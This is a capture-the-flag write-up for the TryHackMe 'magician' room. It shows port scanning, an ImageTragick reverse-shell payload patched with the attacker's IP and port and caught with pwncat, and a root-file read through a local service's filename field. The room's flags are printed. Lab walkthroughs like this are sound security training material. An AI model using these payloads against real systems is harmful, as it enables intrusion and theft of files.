Information
Room
Name: magician
Profile: tryhackme.com
Difficulty: Easy
Description : This magical website lets you convert image file formats
Write-up
Overview
Install tools used in this WU on BlackArch Linux:
$ sudo pacman -S nmap payloadsallthethings ruby-ctf-party pwncat
Network enumeration
Port and service scan with nmap:
# Nmap 7.91 scan initiated Tue Feb 23 20:19:29 2021 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.2.188
Nmap scan report for magician (10.10.2.188)
Host is up (0.033s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Tue, 23 Feb 2021 19:20:28 GMT
| Connection: close
| {"timestamp":"2021-02-23T19:20:29.162+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Tue, 23 Feb 2021 19:20:27 GMT
| Connection: close
| {"timestamp":"2021-02-23T19:20:24.427+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| RTSPRequest:
| HTTP/1.1 505
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 465
| Date: Tue, 23 Feb 2021 19:20:28 GMT
| <!doctype html><html lang="en"><head><title>HTTP Status 505
| HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
| HTTP Version Not Supported</h1></body></html>
| Socks5:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Tue, 23 Feb 2021 19:20:28 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: CA4D0E532A1010F93901DFCB3A9FC682
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.91%I=7%D=2/23%Time=6035557C%P=x86_64-unknown-linux-gnu
SF:%r(HTTPOptions,13B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x2
SF:0Access-Control-Request-Method\r\nVary:\x20Access-Control-Request-Heade
SF:rs\r\nContent-Type:\x20application/json\r\nDate:\x20Tue,\x2023\x20Feb\x
SF:202021\x2019:20:27\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\"
SF::\"2021-02-23T19:20:24\.427\+0000\",\"status\":404,\"error\":\"Not\x20F
SF:ound\",\"message\":\"No\x20message\x20available\",\"path\":\"/\"}")%r(R
SF:TSPRequest,259,"HTTP/1\.1\x20505\x20\r\nContent-Type:\x20text/html;char
SF:set=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20465\r\nDate:
SF:\x20Tue,\x2023\x20Feb\x202021\x2019:20:28\x20GMT\r\n\r\n<!doctype\x20ht
SF:ml><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20505\x20\xe2\x80\
SF:x93\x20HTTP\x20Version\x20Not\x20Supported</title><style\x20type=\"text
SF:/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20
SF:h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x20{font-size
SF::22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{
SF:font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{height:1px;backgr
SF:ound-color:#525D76;border:none;}</style></head><body><h1>HTTP\x20Status
SF:\x20505\x20\xe2\x80\x93\x20HTTP\x20Version\x20Not\x20Supported</h1></bo
SF:dy></html>")%r(FourOhFourRequest,15E,"HTTP/1\.1\x20404\x20\r\nVary:\x20
SF:Origin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Access-Con
SF:trol-Request-Headers\r\nContent-Type:\x20application/json\r\nDate:\x20T
SF:ue,\x2023\x20Feb\x202021\x2019:20:28\x20GMT\r\nConnection:\x20close\r\n
SF:\r\n{\"timestamp\":\"2021-02-23T19:20:29\.162\+0000\",\"status\":404,\"
SF:error\":\"Not\x20Found\",\"message\":\"No\x20message\x20available\",\"p
SF:ath\":\"/nice%20ports%2C/Tri%6Eity\.txt%2ebak\"}")%r(Socks5,24E,"HTTP/1
SF:\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-L
SF:anguage:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Tue,\x2023\x20Feb\
SF:x202021\x2019:20:28\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20
SF:html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x8
SF:0\x93\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{fon
SF:t-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:
SF:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{f
SF:ont-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x2
SF:0a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;
SF:border:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80
SF:\x93\x20Bad\x20Request</h1></body></html>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 23 20:20:52 2021 -- 1 IP address (1 host up) scanned in 83.04 seconds
We have:
8081: a web app converting images (PNG to JPG)
8080: WhiteLabel Error Page
which is a default generic Spring Boot error page
21: a FTP server
Add an entry in our hosts file:
$ grep magician /etc/hosts
10.10.2.188 magician
FTP discovery
NSE script found nothing about the FTP server (no anonymous connection) but
trying manually on the CLI we get a quite different result:
$ ftp 10.10.2.188
Connected to 10.10.2.188.
220 THE MAGIC DOOR
Name (10.10.2.188:noraj): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
NSE script must have timeout due to delay_successful_login
.
We have access denied on FTP, it was just to give us a hint: imagetragick.
Honestly it doesn't helped since the named of the box is magician
and the
app is about image conversion I know it was about exploiting
an ImageMagick vulnerability.
Web discovery
Uploading PNG at http://10.10.2.188:8081/ doesn't work, but at http://magician:8081/
it works as told in the box intro.
Web exploitation
As we already know we should exploit imagetragick, let's get to it directly,
copying the payload and replacing the placeholder with our IP and port.
$ cp /usr/share/payloadsallthethings/Upload\ Insecure\ Files/Picture\ Image\ Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg .
$ sed -i 's/ip/10.9.19.77/' imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
$ sed -i 's/80/9999/' imagetragik1_payload_imageover_reverse_shell_devtcp.jpg
The vuln is triggered right after upload completion.
$ pwncat -l 9999 -vv
INFO: Listening on :::9999 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:9999 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.2.188:33672 (family 2/IPv4, TCP)
sh: cannot set terminal process group (978): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ id
uid=1000(magician) gid=1000(magician) groups=1000(magician)
sh-4.4$ pwd
/tmp/hsperfdata_magician
sh-4.4$ ls /home
magician
sh-4.4$ cd
sh-4.4$ pwd
/home/magician
sh-4.4$ cat user.txt
THM{edited}
user flag: THM{simsalabim_hex_hex}
Elevation of privilege (EoP): from magician to root
A hint was left to us:
sh-4.4$ cat the_magic_continues
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.
There must be a local service.
sh-4.4$ ss -nlpt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 0.0.0.0:8081 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 127.0.0.1:6666 0.0.0.0:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=915,fd=25))
LISTEN 0 32 *:21 *:*
There something on port 6666.
Let's see if it's a web app:
sh-4.4$ curl http://127.0.0.1:6666
...
<form action="" method="post" class="form" role="form">
<div class="form-group ">
<label class="control-label" for="filename">Enter filename</label>
<input class="form-control" id="filename" name="filename" type="text" value="">
</div>
<input class="btn btn-default" id="submit" name="submit" type="submit" value="Submit">
</form>
...
We could use some pivoting techniques but that won't be necessary here as
the case is very simple.
sh-4.4$ curl http://127.0.0.1:6666 -s -X POST --data 'filename=/root/root.txt'
...
<pre class="page-header">
1010100 1001000 1001101 1111011 1101101 1100001 1100111 1101001 1100011 1011111 1101101 1100001 1111001 1011111 1101101 1100001 1101011 1100101 1011111 1101101 1100001 1101110 1111001 1011111 1101101 1100101 1101110 1011111 1101101 1100001 1100100 1111101 1010
</pre>
...
Decoding the binary gave nothing, I tried a second type and got a flag
encoded with caesar cipher: GUZ{zntvp_znl_znxr_znal_zra_znq}
.
I decoded it with ctf-party .
ctf_party_console
irb(main): 001 : 0 > 'GUZ{zntvp_znl_znxr_znal_zra_znq}' .rot13
=> "THM{edited}"
root flag: THM{magic_may_make_many_men_mad}